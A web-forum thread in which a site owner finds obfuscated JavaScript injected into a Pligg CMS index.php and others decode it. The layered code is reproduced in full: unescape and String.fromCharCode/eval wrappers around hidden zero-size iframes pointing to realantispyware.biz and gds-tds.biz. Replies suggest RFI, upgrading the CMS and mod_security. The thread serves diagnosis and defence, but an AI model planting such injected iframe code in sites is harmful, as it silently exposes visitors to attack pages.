What is This Script

Hi
I found this line at the bottom of my site's index.php file

Nothing to see here, move along.<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%65%61%6C%61%6E%74%69%73%70%79%77%61%72%65%2E%62%69%7A%2F%31%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%6F%6E%4C%6F%61%64%3D%22%73%74%61%74%75%73%3D%64%65%66%61%75%6C%74%53%74%61%74%75%73%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script><script>eval(String.fromCharCode(28+72,39+72,27+72,45+72,37+72,29+72,38+72,44+72,-26+72,47+72,42+72,33+72,44+72,29+72,-32+72,45+72,38+72,29+72,43+72,27+72,25+72,40+72,29+72,-32+72,-33+72,-35+72,-21+72,-5+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-22+72,-24+72,-35+72,-17+72,-21+72,-35+72,-17+72,-22+72,-35+72,-18+72,-21+72,-35+72,-21+72,-4+72,-35+72,-22+72,-22+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-17+72,-20+72,-35+72,-17+72,-24+72,-35+72,-21+72,-7+72,-35+72,-22+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-17+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-4+72,-35+72,-17+72,-20+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-3+72,-35+72,-18+72,-22+72,-35+72,-18+72,-15+72,-35+72,-17+72,-7+72,-35+72,-22+72,-2+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-18+72,-4+72,-35+72,-18+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-3+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-16+72,-35+72,-22+72,-3+72,-35+72,-17+72,-24+72,-35+72,-18+72,-16+72,-35+72,-17+72,-24+72,-35+72,-21+72,-2+72,-35+72,-18+72,-2+72,-35+72,-17+72,-19+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-23+72,-35+72,-21+72,-22+72,-35+72,-21+72,-23+72,-35+72,-21+72,-15+72,-35+72,-21+72,-20+72,-35+72,-21+72,-21+72,-35+72,-21+72,-16+72,-35+72,-21+72,-20+72,-35+72,-21+72,-16+72,-35+72,-21+72,-18+72,-35+72,-22+72,-22+72,-35+72,-22+72,-24+72,-35+72,-17+72,-17+72,-35+72,-18+72,-15+72,-35+72,-18+72,-20+72,-35+72,-17+72,-20+72,-35+72,-18+72,-16+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-16+72,-35+72,-18+72,-19+72,-35+72,-18+72,-15+72,-35+72,-18+72,-17+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-18+72,-22+72,-35+72,-18+72,-2+72,-35+72,-17+72,-22+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-22+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-21+72,-3+72,-35+72,-21+72,-5+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-21+72,-3+72,-33+72,-31+72,-31+72,-13+72));</script>

Code (markup):

I got the help & told that this is malware script which is actually

'<iframe src="http://realantispyware.biz/1/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>

Code (markup):

I have removed the script now, but wondering how it could be possible for someone to install it AND how to prevent this from happening again in future. Current file attribute is set to 644. Please help. Thanks

 

Looks to me like it's an encrypted footer. Using WordPress? Using a free 'sponsored' theme?

Sponsored themes will sometimes use an encrypted footer to keep webmasters from changing the paid links in the bottom of the theme.

 

It outputs as....

Nothing to see here, move along.<script>document.write(unescape('<iframe src="http://realantispyware.biz/1/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>'));</script><script>eval(String.fromCharCode(28+72,39+72,27+72,45+72,37+72,29+72,38+72,44+72,-26+72,47+72,42+72,33+72,44+72,29+72,-32+72,45+72,38+72,29+72,43+72,27+72,25+72,40+72,29+72,-32+72,-33+72,-35+72,-21+72,-5+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-22+72,-24+72,-35+72,-17+72,-21+72,-35+72,-17+72,-22+72,-35+72,-18+72,-21+72,-35+72,-21+72,-4+72,-35+72,-22+72,-22+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-17+72,-20+72,-35+72,-17+72,-24+72,-35+72,-21+72,-7+72,-35+72,-22+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-17+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-4+72,-35+72,-17+72,-20+72,-35+72,-18+72,-20+72,-35+72,-17+72,-21+72,-35+72,-22+72,-3+72,-35+72,-18+72,-22+72,-35+72,-18+72,-15+72,-35+72,-17+72,-7+72,-35+72,-22+72,-2+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-18+72,-4+72,-35+72,-18+72,-2+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-3+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-16+72,-35+72,-22+72,-3+72,-35+72,-17+72,-24+72,-35+72,-18+72,-16+72,-35+72,-17+72,-24+72,-35+72,-21+72,-2+72,-35+72,-18+72,-2+72,-35+72,-17+72,-19+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-23+72,-35+72,-21+72,-22+72,-35+72,-21+72,-23+72,-35+72,-21+72,-15+72,-35+72,-21+72,-20+72,-35+72,-21+72,-21+72,-35+72,-21+72,-16+72,-35+72,-21+72,-20+72,-35+72,-21+72,-16+72,-35+72,-21+72,-18+72,-35+72,-22+72,-22+72,-35+72,-22+72,-24+72,-35+72,-17+72,-17+72,-35+72,-18+72,-15+72,-35+72,-18+72,-20+72,-35+72,-17+72,-20+72,-35+72,-18+72,-16+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-16+72,-35+72,-18+72,-19+72,-35+72,-18+72,-15+72,-35+72,-18+72,-17+72,-35+72,-18+72,-16+72,-35+72,-17+72,-20+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-22+72,-24+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-18+72,-22+72,-35+72,-18+72,-2+72,-35+72,-17+72,-22+72,-35+72,-18+72,-20+72,-35+72,-18+72,-19+72,-35+72,-17+72,-22+72,-35+72,-21+72,-4+72,-35+72,-21+72,-24+72,-35+72,-21+72,-3+72,-35+72,-21+72,-5+72,-35+72,-22+72,-2+72,-35+72,-18+72,-15+72,-35+72,-18+72,-18+72,-35+72,-17+72,-22+72,-35+72,-18+72,-23+72,-35+72,-18+72,-4+72,-35+72,-18+72,-19+72,-35+72,-21+72,-3+72,-33+72,-31+72,-31+72,-13+72));</script>

Code (markup):

Which is a reported attack site (using Nod32)

The eval from the above code outputs as...

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%64%73%2D%74%64%73%2E%62%69%7A%2F%64%65%6D%6F%2F%69%6E%64%65%78%2E%70%68%70%3F%6F%75%74%3D%31%32%31%39%34%33%38%34%38%36%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));

Code (markup):

And that unescapes as...

<iframe src="http://gds-tds.biz/demo/index.php?out=1219438486" width=0 height=0 frameborder=0></iframe>

Code (markup):

Ask yourself why they felt the need to encode it 3 times. And why it's reported as an attack site. I'd avoid using it.

 

Hi
I did not put this script. It was put by some hacker. I have removed this, but want to know how it was possible for someone to put this script & how I can avoid this from happening again. Current CHMOD is 644. thanks

 

Seems to me like it's an RFI (Remote File Inclusion) exploit.

A little more info is needed.

What script are you using?
Version number?
URL?

 

I am using Pligg CMS 9.6

 

You seem to be using an old version.
Update to Pligg Beta 9.9.5 and you should be fine

 

u useing shared hosteing or dedicated server?

 

if ur useing dedicated host then install mod_security it will help from iframe

 

It's on shared hosting.

 

contact hoster sure they will slove ur issue

 

Which specific Mod_security rule(s) block against iframe attacks?